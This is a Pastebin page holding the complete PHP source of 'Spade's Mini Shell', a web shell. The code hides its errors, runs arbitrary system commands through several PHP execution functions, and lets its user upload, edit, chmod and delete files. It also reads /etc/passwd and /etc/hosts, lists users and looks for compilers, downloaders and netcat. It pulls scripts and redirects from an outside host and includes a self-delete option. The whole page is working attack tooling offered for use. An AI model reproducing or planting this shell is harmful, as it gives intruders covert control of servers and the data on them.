Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- // Spade's Mini Shell
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('display_errors', 0);
- @error_reporting(0);
- @error_log(false);
- $slash = '/';
- if(strtolower(substr(PHP_OS,0,3))=='win'){ $os = 'win'; $slash = '\\'; $ox = "Windows";}else{ $os = "nix"; $ox = "Linux"; }
- function sanitize($object){
- return filter_var(htmlspecialchars($object), FILTER_SANITIZE_STRING);
- }
- function get_users(){
- $users = array();
- $user = file("/etc/passwd");
- foreach ($user as $userx => $userz) {
- $userct = explode(":", $userz);
- array_push($users,$userct[0]);
- }
- if(!$user){
- if($open = opendir("/home/")){
- while(($file = readdir($open)) !== false){ array_push($users, $file); }
- }
- closedir($open);
- }
- $users = implode(', ', $users);
- return $users;
- }
- function exe($cmd){
- if(function_exists('system')) {
- @ob_start();
- @system($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- }elseif(function_exists('exec')) {
- @exec($cmd,$results);
- $buff = join("\n", $results);
- } elseif(function_exists('passthru')) {
- @ob_start();
- @passthru($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- } elseif(function_exists('shell_exec')) {
- $buff = @shell_exec($cmd);
- }elseif(function_exists('proc_open')){
- $desc = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
- $handle = proc_open($cmd, $desc, $pipes);
- if(is_resource($handle)){
- if(function_exists('fread') && function_exists('feof')){
- while(!feof($pipes[1])){ $buff .= fread($pipes[1], 512); }
- }elseif(function_exists('fgets') && function_exists('feof')){
- while(!feof($pipes[1])){ $buff .= fgets($pipes[1], 512); }
- }
- }
- pclose($handle);
- }elseif(function_exists('popen')){
- $handle = popen($cmd, "r");
- if(is_resource($handle)){
- if(function_exists('fread') && function_exists('feof')){
- while(!feof($handle)){ $buff .= fread($handle, 512); }
- }elseif(function_exists('fgets') && function_exists('feof')){
- while(!feof($handle)){ $buff .= fgets($handle, 512); }
- }
- }
- pclose($handle);
- }
- $buff = wordwrap(htmlspecialchars($buff));
- return $buff;
- }
- echo "
- <!DOCTYPE html>
- <html>
- <head>
- <link rel=\"shortcut icon\" href=\"http://i.imgur.com/iuhnNKU.png\" />
- <meta name=\"ROBOTS\" content=\"NOINDEX, NOFOLLOW, NOARCHIVE\" />
- <meta name=\"GOOGLEBOT\" content=\"NOINDEX, NOFOLLOW, NOARCHIVE\" />
- <meta charset=\"UTF-8\">
- <script type=\"text/javascript\" src=\"http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js\"></script>
- <link href='http://fonts.googleapis.com/css?family=Monoton' rel='stylesheet' type='text/css'>
- <title>:~Spade Mini Shell~:</title>
- <style>
- @import url(\"http://fonts.googleapis.com/css?family=Iceberg:400\");
- *, body, html { text-shadow: 0px 0px 1px #141414; cursor: url(http://cur.cursors-4u.net/cursors/cur-9/cur863.ani), url(http://cur.cursors-4u.net/cursors/cur-9/cur863.png), default !important;}
- html {font-family: 'Iceberg';}
- .chekwa{ display: none;}
- .wala { border-bottom: none;}
- input { border: none; background: none; font-family: 'Courier New';}
- textarea{ background: #111111; font-family: 'Courier New'; font-size: 15px; border: 1px dashed lime; border-radius: 15px; padding: 10px; color: white;}
- .submit{ background: lime; color: black; }
- select{ background: lime; color: black; font-family: 'Courier New'; border: none;}
- option{ font-family: 'Courier New'; background: lime; border: none;}
- .titulo {text-shadow: 0pt 0pt 0.99em lime, 0pt 0pt 0.99em lime;color: #00ff00;text-decoration: none;}
- body { background: #111111; color: white; text-align : center;}
- .foot{ position: relative; width: 100%; bottom: 0;}
- a { color: white; text-decoration: none;}
- #details{ -moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; min-height:100px; margin-top: 10px;}
- tr:hover { background: #141414;}
- a:hover { text-shadow: 0pt 0pt 0.99em lime, 0pt 0pt 0.99em lime;color: #00ff00;text-decoration: none; }
- .lamesa, .mesa { width:100%; padding:4px 0; color:white; font-size:15px;}
- .mesa td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:top;}
- .board {text-align: center;border: 1px solid rgba(255,180,0,0.4);border-radius: 4px;width: 500px;font-family: 'Monoton'}
- .board p {font-size: 65px;font-family: 'Monoton', cursive;color: #fff;text-transform: uppercase;padding: 0;margin: 0;}
- pre { text-align: left;}
- .pare{ border: 1px dashed lime; border-radius: 15px; color: #9b9b9b; font-size: 15px; font-family: 'Courier New'; padding: 15px;}
- textarea:focus{ outline: none;}
- .piktur { width: 60px; cursor: pointer; opacity: .5; transition: .5s ease-in-out;}
- .piktur:hover { opacity: 1; width: 75px;}
- code { font-family: monospace; }
- </style>";?>
- <script type="text/javascript">
- $(document).ready(function() {$('#spade').novacancy({'reblinkProbability': 0.1,'blinkMin': 0.2,'blinkMax': 0.6,'loopMin': 8,'loopMax': 10,'color': '#ffffff','glow': ['0 0 80px #ffffff', '0 0 30px #008000', '0 0 6px #0000ff']});
- $('#pirates').novacancy({'blink': 1,'off': 1,'color': 'Red','glow': ['0 0 80px Red', '0 0 30px FireBrick', '0 0 6px DarkRed']});});
- </script>
- <?php echo "
- </head>
- <body>
- <noscript><meta http-equiv=\"refresh\" content=\"0; URL=http://xbox.nu/sssssssssssppppppppppaaaaaaaaaaaadddddddeeeeeeeee.html\"></noscript>
- <center><div class=\"board\" style=\"width: 30%;\"><p id=\"spade\">Spade</p><p id=\"pirates\">Mini Shell</p></div></center>
- <div id='details'>
- <table class=\"lamesa\" cellpadding=\"3\" cellspacing\"1\">
- <tr>
- <td><font class=\"titulo wala\">Directory:~$</font> ";
- if(isset($_GET['path'])){
- $path = sanitize($_GET['path']);
- }else{
- $path = sanitize(getcwd());
- }
- $path = str_replace('\\','/',$path);
- $paths = explode('/',$path);
- foreach($paths as $id=>$peth){
- if($peth == '' && $id == 0){
- $a = true;
- echo "<a href=\"?path=/\">/</a>";
- continue;
- }//if
- if($peth == '') continue;
- echo "<a href='?path=";
- for($i=0;$i<=$id;$i++){
- echo $paths[$i];
- if($i != $id) echo "/";
- }//for
- echo "'>".$peth."</a>/";
- }//foreach
- echo "
- </td>
- </tr>
- <tr>
- <td>";
- if(isset($_FILES['file'])){
- if(@copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
- echo "<font color=lime><a href=".sanitize($_FILES['file']['name'])." target='_blank'>File Uploaded!</font><br/>";
- }else{
- echo "<font color=red>File Not Uploaded!</font><br/>";
- }//upload
- }//file
- echo "
- <form method=POST enctype=\"multipart/form-data\"><font class=\"titulo wala\">Upload File<br><label for=\"upload\"><img class=\"piktur\" src=\"http://xbox.nu/upload.png\"><input id=\"upload\" class=\"chekwa\" type=\"file\" name=\"file\"></label><br><input type=\"submit\" class=\"submit\" ";
- if(!is_writable($path)){echo "disabled value='Not Writable!' style='background: red;'";}else{ echo "value='Upload!'"; }
- echo "
- ></form>
- </td>
- </tr><tr><td class=\"wala\">[<a href=".sanitize($_SERVER['PHP_SELF']).">Home</a>] [<a href='?details'>System Details</a>] [<a href='?kill'>Kill Me</a>]</td></tr></table></div><table>";
- if(isset($_GET['details'])){
- global $os;
- $ds = @ini_get("disable_functions");
- $show_ds = (!empty($ds)) ? "<font color=red>".sanitize(wordwrap($ds))."</font>" : "<font color=gold>NONE</font>";
- echo "</table><div id=\"details\"><table class=\"mesa\" width=100%><center>
- <tr><td><h1 class=titulo>System Information</h1></td></tr>
- <tr><td><font color=lime>OS</font>:: <font color=gold>".php_uname(s)."</font></td></tr>
- <tr><td><font color=lime>PHP Version</font>:: <font color=gold>".phpversion()."</font></td></tr>
- <tr><td><font color=lime>Kernel Release</font>:: <font color=gold>".php_uname(r)."</font></td></tr>
- <tr><td><font color=lime>Kernel Version</font>:: <font color=gold>".php_uname(v)."</font></td></tr>
- <tr><td><font color=lime>Machine</font>:: <font color=gold>".php_uname(m)."</font></td></tr>
- <tr><td><font color=lime>Server Software</font>:: <font color=gold>".$_SERVER['SERVER_SOFTWARE']."</font></td></tr>
- <tr><td style=\"text-align:left\"><font color=lime>Disabled Functions</font>:: <font color=gold>".wordwrap($show_ds)."</font></td></tr>";
- if(function_exists('apache_get_modules')){
- echo "<tr><td style=\"text-align:left\"><font color=lime>Loaded Apache Modules</font>:: <pre>";
- $apache = implode(', ', apache_get_modules());
- echo wordwrap($apache);
- echo "</pre></td></tr>";
- }//apache
- if($os == 'win'){echo "<tr><td style=\"text-align:left\"><font color=lime>Account Settings</font>:: <pre>".exe('net accounts')."</pre></td></tr><tr><td style=\"text-align:left\"><font color=lime>User Accounts</font>:: <pre>".exe('net user')."</pre></td></tr>";}//Windows
- if($os == 'nix'){
- echo "<tr><td style=\"text-align:left\"><font color=lime>Distro</font>:: <pre>".exe('cat /etc/*-release')."</pre></td></tr>
- <tr><td style=\"text-align:left\"><font color=lime>Distro Name</font>:: <pre>".exe('cat /etc/issue.net')."</pre></td></tr>
- <tr><td style=\"text-align:left\"><font color=lime>GCC</font>:: <pre>".exe('whereis gcc')."</pre></td></tr>
- <tr><td style=\"text-align:left\"><font color=lime>Perl</font>:: <pre>".exe('whereis perl')."</pre></td></tr>
- <tr><td style=\"text-align:left\"><font color=lime>Java</font>:: <pre>".exe('whereis java')."</pre></td></tr>
- <tr><td style=\"text-align:left\"><font color=lime>Python</font>:: <pre>".exe('whereis python')."</pre></td></tr>
- <tr><td style=\"text-align:left\"><font color=lime>Apache</font>:: <pre>".exe('whereis apache')."</pre></td></tr>
- <tr><td style=\"text-align:left\"><font color=lime>CPU</font>:: <pre>".exe('cat /proc/cpuinfo')."</pre></td></tr>
- <tr><td style=\"text-align:left\"><font color=lime>RAM</font>:: <pre>".exe('free -m')."</pre></td></tr>
- <tr><td style=\"text-align:left\"><font color=lime>User Limits</font>:: <pre>".exe('ulimit -a')."</pre></td></tr>
- ";
- $useful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
- $uze=array();
- foreach($useful as $uzeful){
- if(exe("which $uzeful")){
- $uze[]=$uzeful;
- }
- }
- echo "<tr><td style='text-align:left'><font color=lime>Useful</font>::<pre>";
- echo implode(', ',$uze);
- echo "</pre></td></tr>";
- $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
- $uze=array();
- foreach($downloaders as $downloader){
- if(exe("which $downloader")){
- $uze[]=$downloader;
- }
- }
- echo "<tr><td style='text-align:left'><font color=lime>Downloaders</font>::<pre>";
- echo implode(', ',$uze);
- echo "</pre></td></tr>";
- echo "<tr><td style='text-align:left'><font color=lime>Users</font>::<pre>".wordwrap(get_users())."</pre</font></td></tr>
- <tr><td style='text-align:left'><font color=lime>Hosts</font>::<pre>".exe('cat /etc/hosts')."</pre></font></td></tr>";
- }//Linux
- echo "</table></div>";
- }elseif(isset($_GET['kill'])){
- $me = sanitize($_SERVER['PHP_SELF']);
- $akez = basename($me);
- if(unlink($akez)){
- echo "<script>alert('Sayonara Suckers .|.')</script><meta http-equiv=\"refresh\" content=\"0; URL=http://xbox.nu/r3dDXDTOOL.swf\">";
- }else{ echo "<center><font color=red>Still Alive!</font></center>"; }
- }elseif(isset($_GET['filesource'])){
- echo "<tr><td class=\"titulo\"><center>Current File:~$ ".sanitize($_GET['filesource'])."</center></td></tr></table><br/>";
- echo "<pre class=\"pare\"><code>".wordwrap(sanitize(file_get_contents($_GET['filesource'])))."</code></pre>";
- }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
- echo "</table><br><center>".sanitize($_GET['path'])."<br><br>";
- if($_POST['opt'] == 'chmod'){
- if(isset($_POST['perm'])){
- if(@chmod($_POST['path'], $_POST['perm'])){
- echo "<font color=lime>Permission Changed!</font>";
- }else{
- echo "<font color=red>Permission Not Change!</font>";
- }//change perm * chmod
- }//perm
- echo "<form method=POST><font class=\"titulo\">Permission:~$ </font><input type=\"text\" name=\"perm\" size=\"4\" value='".substr(sprintf('%o', fileperms($_POST['path'])), -4)."'><input type=\"hidden\" name=\"path\" value='".$_POST['path']."'><input type=\"hidden\" name=\"opt\" value=\"chmod\"><input type=\"submit\" class=\"submit\" value=\">>\"></form>";
- }elseif($_POST['opt'] == 'rename'){
- if(isset($_POST['newname'])){
- if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
- echo "<font color=lime>File Name Changed!</font><br>";
- }else{
- echo "<font color=red>File Name Not Change!</font>";
- }//rename
- $_POST['name'] = $_POST['newname'];
- }//rename
- echo "<form method=POST><font class=\"titulo\">New Name:~$ </font><input name= \"newname\" type=\"text\" size=\"20\" value='".sanitize($_POST['name'])."'><input type=\"hidden\" name=\"path\" value='".sanitize($_POST['path'])."'><input type=\"hidden\" name=\"opt\" value=\"rename\"><input type=\"submit\" class=\"submit\" value=\">>\"></form>";
- }elseif($_POST['opt'] == 'edit'){
- if(isset($_POST['source'])){
- $fopen = fopen($_POST['path'], 'w');
- if(fwrite($fopen, $_POST['source'])){
- echo "<font color=lime>File Editted!</font><br>";
- }else{
- echo "<font color=red>File Not Editted!</font><br>";
- }//fwrite
- fclose($fopen);
- }//source
- echo "<form method=POST><textarea cols=80 rows=20 name=\"source\">".sanitize(file_get_contents($_POST['path']))."</textarea><br><input type=\"hidden\" name=\"path\" value='".sanitize($_POST['path'])."'><input type=\"hidden\" name=\"opt\" value=\"edit\"><input type=\"submit\" class=\"submit\" value=\">>\"></form>";
- }//chmod//rename//edit
- echo "</center>";
- }else{
- echo "</table><br></center>";
- if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
- if($_POST['type'] == 'dir'){
- if(rmdir($_POST['path'])){
- echo "<font color=lime>Directory Deleted!</font><br>";
- }else{
- echo "<font color=red>Directory Not Deleted!</font><br>";
- }//rmdir
- }elseif($_POST['type'] == 'file'){
- if(unlink($_POST['path'])){
- echo "<font color=lime>File Deleted!</font><br>";
- }else{
- echo "<font color=red>File Not Deleted!</font><br>";
- }//unlink
- }//dir//file
- }//delete
- echo "</center>";
- $scandir = scandir($path);
- echo "
- <div class=\"content\" id=\"details\">
- <table class=\"lamesa\" cellpadding=\"3\" cellspacing=\"1\">
- <tr>
- <th><font class=\"titulo\">Name</font></th>
- <th><font class=\"titulo\">Size</font></th>
- <th><font class=\"titulo\">Permissions</font></th>
- <th><font class=\"titulo\">Options</font></th>
- </tr>";
- foreach($scandir as $dir){
- if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
- echo "
- <tr>
- <td><a href=\"?path=".$path."/".$dir."\">".$dir."</a></td>
- <td><center>~</center></td>
- <td><center>";
- if(is_writable($path.'/'.$dir)) echo "<font color=lime>";//is_writable
- elseif(!is_readable($path.'/'.$dir)) echo "<font color=red>";//is_readable
- echo perms($path.'/'.$dir);
- if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo "</font>";
- echo "</center></td>
- <td><center>
- <form method=POST action=\"?option&path=".$path."\">
- <select name=\"opt\">
- <option value=\"\"></option>
- <option value=\"delete\">Delete</option>
- <option value=\"chmod\">Chmod</option>
- <option value=\"rename\">Rename</option>
- </select>
- <input type=\"hidden\" name=\"type\" value=\"dir\">
- <input type=\"hidden\" name=\"name\" value='".$dir.">
- <input type=\"hidden\" name=\"path\" value='".$path."/".$dir.">
- <input type=\"submit\" class=\"submit\" value=\">>\">
- </form>
- </center></td>
- </tr>";
- }//foreach
- echo "
- <tr>
- <td>----------------</td><td>----------------</td><td>----------------</td><td>----------------</td>
- </tr>";
- foreach($scandir as $file){
- if(!is_file($path.'/'.$file)) continue;//is_file
- $size = filesize($path.'/'.$file)/1024;
- $size = round($size,3);
- if($size >= 1024){
- $size = round($size/1024,2).' MB';
- }else{
- $size = $size.' KB';
- }//size
- echo "
- <tr>
- <td><a href=\"?filesource=".$path."/".$file."&path=".$path."\">".$file."</a></td>
- <td><center>".$size."</center></td>
- <td><center>";
- if(is_writable($path.'/'.$file)) echo "<font color=lime>";//is_writable
- elseif(!is_readable($path.'/'.$file)) echo "<font color=red>";//is_readable
- echo perms($path.'/'.$file);
- if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo "</font>";
- echo "</center></td>
- <td><center>
- <form method=POST action=\"?option&path=".$path."\">
- <select name=\"opt\">
- <option value=\"\"></option>
- <option value=\"edit\">Edit</option>
- <option value=\"delete\">Delete</option>
- <option value=\"chmod\">Chmod</option>
- <option value=\"rename\">Rename</option>
- </select>
- <input type=\"hidden\" name=\"type\" value=\"file\">
- <input type=\"hidden\" name=\"name\" value='".$file."'>
- <input type=\"hidden\" name=\"path\" value='".$path."/".$file."'>
- <input type=\"submit\" class=\"submit\" value=\">>\">
- </form>
- </center></td>
- </tr>";
- }//foreach
- echo "
- </table>
- </div>";
- }//filesource//Delete
- echo "
- </table>
- <script type=\"text/javascript\" src=\"http://xbox.nu/novacancy.js\"></script>
- <div class='foot'>
- <hr width='80%'>
- <footer>© <font color=lime class=titulo>Spade</font> ".date('Y')."</footer>
- </div>
- </body>
- </html>";
- function perms($file){
- $perms = fileperms($file);
- if (($perms & 0xC000) == 0xC000) {
- // Socket
- $info = 's';
- } elseif (($perms & 0xA000) == 0xA000) {
- // Symbolic Link
- $info = 'l';
- } elseif (($perms & 0x8000) == 0x8000) {
- // Regular
- $info = '-';
- } elseif (($perms & 0x6000) == 0x6000) {
- // Block special
- $info = 'b';
- } elseif (($perms & 0x4000) == 0x4000) {
- // Directory
- $info = 'd';
- } elseif (($perms & 0x2000) == 0x2000) {
- // Character special
- $info = 'c';
- } elseif (($perms & 0x1000) == 0x1000) {
- // FIFO pipe
- $info = 'p';
- } else {
- // Unknown
- $info = 'u';
- }
- // Owner
- $info .= (($perms & 0x0100) ? 'r' : '-');
- $info .= (($perms & 0x0080) ? 'w' : '-');
- $info .= (($perms & 0x0040) ?
- (($perms & 0x0800) ? 's' : 'x' ) :
- (($perms & 0x0800) ? 'S' : '-'));
- // Group
- $info .= (($perms & 0x0020) ? 'r' : '-');
- $info .= (($perms & 0x0010) ? 'w' : '-');
- $info .= (($perms & 0x0008) ?
- (($perms & 0x0400) ? 's' : 'x' ) :
- (($perms & 0x0400) ? 'S' : '-'));
- // World
- $info .= (($perms & 0x0004) ? 'r' : '-');
- $info .= (($perms & 0x0002) ? 'w' : '-');
- $info .= (($perms & 0x0001) ?
- (($perms & 0x0200) ? 't' : 'x' ) :
- (($perms & 0x0200) ? 'T' : '-'));
- return $info;
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement